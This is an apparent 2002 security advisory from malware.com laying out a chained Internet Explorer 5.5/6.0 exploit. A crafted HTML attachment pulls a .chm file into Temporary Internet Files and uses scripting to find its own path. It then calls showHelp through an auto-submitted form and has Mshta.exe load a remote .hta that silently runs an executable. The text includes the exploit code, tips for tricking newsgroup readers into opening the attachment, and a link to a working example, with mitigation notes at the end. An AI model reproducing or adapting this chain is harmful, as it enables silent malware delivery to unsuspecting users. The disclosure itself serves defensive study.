Thursday, February 7, 2002

Default installation of Internet Explorer 5.5 and 6.0 still allows us
to execute files on default installations of the target computer,
technically trivial silent delivery and installation of an executable
on the target computer.:

We cobble together new and old Components as follows : -

1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1033)
2. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/2456)
3. Mshta.exe (http://www.malware.com/foobar.hta)

The manufacturer has done a really tremendous job of tightening down
any possibility to effect either 1 or 2 above. Nothing can be
activated through the Temporary Internet Files unless full path names
are known for both showHelp calling and Click() of our link.
Previously it was possible as long as all components were in the same
directory and only file names known.

Nevertheless:

We are able to retrieve from the Temporary Internet File our
trojanised html, determine the location of it, write this location
out to our showHelp call and thereafter execute our remote link.

What?

We create a very simple *.html file like so:

 <bgsound src=\"http://www.malware.com/malware.chm\">

this will pull our *.chm into the Temporary Internet File

when then include the Guninski scripting to determine the location of
our *.html file like so:

malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf(\"\\\\\"));
path=unescape(path);

we then take that location information and write it to a simple html
form like so:

document.write(\'<FORM name=\"malware\"
ACTION=\"javascript:window.showHelp(document.forms[0].elements
[0].value)\">\');
document.write(\'<form><input type=\"hidden\"  size=\"40\"
maxlength=\"80\"
value=\"\'+path+\'\\\\malware[1].chm\"></form>\');

technical note: it seems the myriad of patching to date does not make
it possible to pass the location directly to the showHelp call. It
must be written to the form which can then be automatically submitted:

setTimeout(\'document.malware.submit()\',5000);

before we do all that we create our very simple malware.chm and
include our link object like so:

C:\\WINDOWS\\SYSTEM\\Mshta.exe,http://www.malware.com/foobar.hta

this is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta
which includes our executable. All without warning.

technical note: the possibility is excellent to repeat the entire
process above directly inside the *.chm file and drop an *.exe from
within the *.chm into the same Temporary Internet File. Using our
Guninski scripting to determine the location of the *.chm and write
that to the link parameter within it: value=\"\'+path+\'\\\\malware
[1].exe\"> and execute it.

So what happens?

We construct our trojanised *.html file and send it off to our target
computer. This can be via mail or news. The recipient receives the
mail message and attached *.html file. We then convince our
unsuspecting recipient to open our *.html. This should be quite
trivial, particularly in news as the attached file is in fact nothing
more than a 500 byte html file.

Consider the following scenario in your favourite web design news
group:

Carefully note: there is a hardened security warning when attempting
to open attached *.html file. However our combination call for
assistance coupled with nothing more than a legitimate *.html file
should prove more than tempting:

(screen shot: http://www.malware.com/duh.png 18KB)

Why does it happen?

Because our simple *.html file is an attachment, security has it
transfer to the Internet Temporary File for opening, under the
security browser\'s settings. However, precisely because it is
physically opened within the TIF, we can use our Guninski scripting
to determine the exact location, write that exact location to our
form and call our *.chm where it too resides.

Working Example: (includes harmless *.exe -- the *.chm is hardcoded
for win98)

[note: due to pathetic technical reasons our *.chm is off-site and
may delay in transferring to the TIF and could possibly fail]

nb: working example must be attached to mail or news

http://www.malware.com/help!.zip

Notes:

1. Be aware of \"innocent\" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. Disable the HHCtrl ActiveX control
[see:http://www.kb.cert.org/vuls/id/25249 ]
4. Disable or Remove Mshta.exe [although if an *.exe embedded
directly into the *.chm then this has no impact]
5. None.


by www.malware.com